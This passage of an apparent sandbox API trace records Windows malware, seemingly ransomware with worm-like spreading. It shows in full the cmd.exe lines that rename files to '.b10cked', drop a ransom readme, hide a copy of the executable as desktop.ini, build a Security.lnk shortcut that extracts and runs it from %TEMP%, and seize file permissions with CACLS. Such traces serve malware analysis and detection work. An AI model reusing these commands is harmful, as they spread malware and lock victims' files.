cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\DIRECT~1.ACR\" \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\directories.acrodata.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xb48, dwThreadId=0xa80)) returned 1 [0145.854] CloseHandle (hObject=0x110) returned 1 [0145.854] CloseHandle (hObject=0x114) returned 1 [0145.854] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", cchLength=0x39 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\") returned 0x39 [0145.854] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0145.854] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\", cchCount1=57, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount2=26) returned 1 [0145.854] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", cchLength=0x39 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\") returned 0x39 [0145.854] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0145.854] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\", cchCount1=57, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0145.854] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0145.855] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0145.855] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0145.855] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\") returned 0x37 [0145.855] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0145.855] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0145.855] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xb2c, dwThreadId=0x968)) returned 1 [0145.860] CloseHandle (hObject=0x110) returned 1 [0145.860] CloseHandle (hObject=0x114) returned 1 [0145.860] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\bl0cked-readme.rtf")) returned 0xffffffff [0145.860] GetLastError () returned 0x2 [0145.860] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0145.862] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\bl0cked-readme.rtf")) returned 0x2020 [0145.862] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0145.862] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0145.862] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0145.862] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0145.862] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0145.863] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0145.863] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0145.863] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\") returned 0x37 [0145.863] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0145.863] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0145.863] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security") returned 0x36 [0145.863] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x196 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\ADOBE\\ACROBAT\\10.0\\REPLIC~1\\SECURITY\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\ADOBE\\ACROBAT\\10.0\\REPLIC~1\\SECURITY\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\ADOBE\\ACROBAT\\10.0\\REPLIC~1\\SECURITY\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\ADOBE\\ACROBAT\\10.0\\REPLIC~1\\SECURITY\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x196 [0145.863] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0145.863] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xac8, dwThreadId=0xa94)) returned 1 [0145.871] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0146.801] CloseHandle (hObject=0x114) returned 1 [0146.801] CloseHandle (hObject=0x110) returned 1 [0146.801] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0146.801] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0146.801] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0146.801] GetTickCount () returned 0x2da57 [0146.801] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20359072200) returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x5a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x72\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x52\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x65\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6c\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0146.802] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0146.802] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0146.802] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0146.802] CharUpperBuffW (in: lpsz="explorer.exe \"Security\" & type \"Security\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"SECURITY\" & TYPE \"SECURITY\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0146.802] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0146.802] CharUpperBuffW (in: lpsz="explorer.exe \"Security\" & type \"Security\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"SECURITY\" & TYPE \"SECURITY\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0146.802] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0146.802] CoInitialize (pvReserved=0x0) returned 0x0 [0146.802] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0146.804] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0146.804] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0146.804] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0146.806] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Security\" & type \"Security\\desktop.ini\" > \"%TEMP%\\ZrRexJlz.exe\" && \"%TEMP%\\ZrRexJlz.exe\"") returned 0x0 [0146.806] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0146.806] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0146.806] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0146.806] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security.lnk", fRemember=0) returned 0x0 [0146.860] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0146.860] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0146.860] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0146.860] CoUninitialize () [0146.861] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0146.861] ReleaseMutex (hMutex=0xf8) returned 1 [0146.861] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0146.861] ReleaseMutex (hMutex=0xf8) returned 1 [0146.861] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0146.861] ReleaseMutex (hMutex=0xf8) returned 1 [0146.861] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0146.861] ReleaseMutex (hMutex=0xf8) returned 1 [0146.861] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.863] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x12eab4*="background.png") returned 0x66 [0146.863] GetLastError () returned 0x5 [0146.863] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0146.863] LocalFree (hMem=0x1c6cc8) returned 0x0 [0146.863] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0146.863] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0146.864] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0146.864] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0146.864] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0146.864] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0146.864] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xb10, dwThreadId=0xbdc)) returned 1 [0146.869] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0147.273] CloseHandle (hObject=0x110) returned 1 [0147.273] CloseHandle (hObject=0x114) returned 1 [0147.273] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.273] ReleaseMutex (hMutex=0xf8) returned 1 [0147.273] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.273] ReleaseMutex (hMutex=0xf8) returned 1 [0147.273] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.273] ReleaseMutex (hMutex=0xf8) returned 1 [0147.273] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.273] ReleaseMutex (hMutex=0xf8) returned 1 [0147.273] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.274] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x12eab4*="background.png") returned 0x66 [0147.274] GetLastError () returned 0x5 [0147.274] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0147.274] LocalFree (hMem=0x1c6cc8) returned 0x0 [0147.274] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0147.274] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0147.274] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0147.274] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0147.274] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0147.274] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\", cchLength=0x39 | out: lpsz="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\") returned 0x39 [0147.274] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\ADOBE\\ACROBAT\\10.0\\REPLICATE\\SECURITY\\", cchCount2=57) returned 3 [0147.274] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device 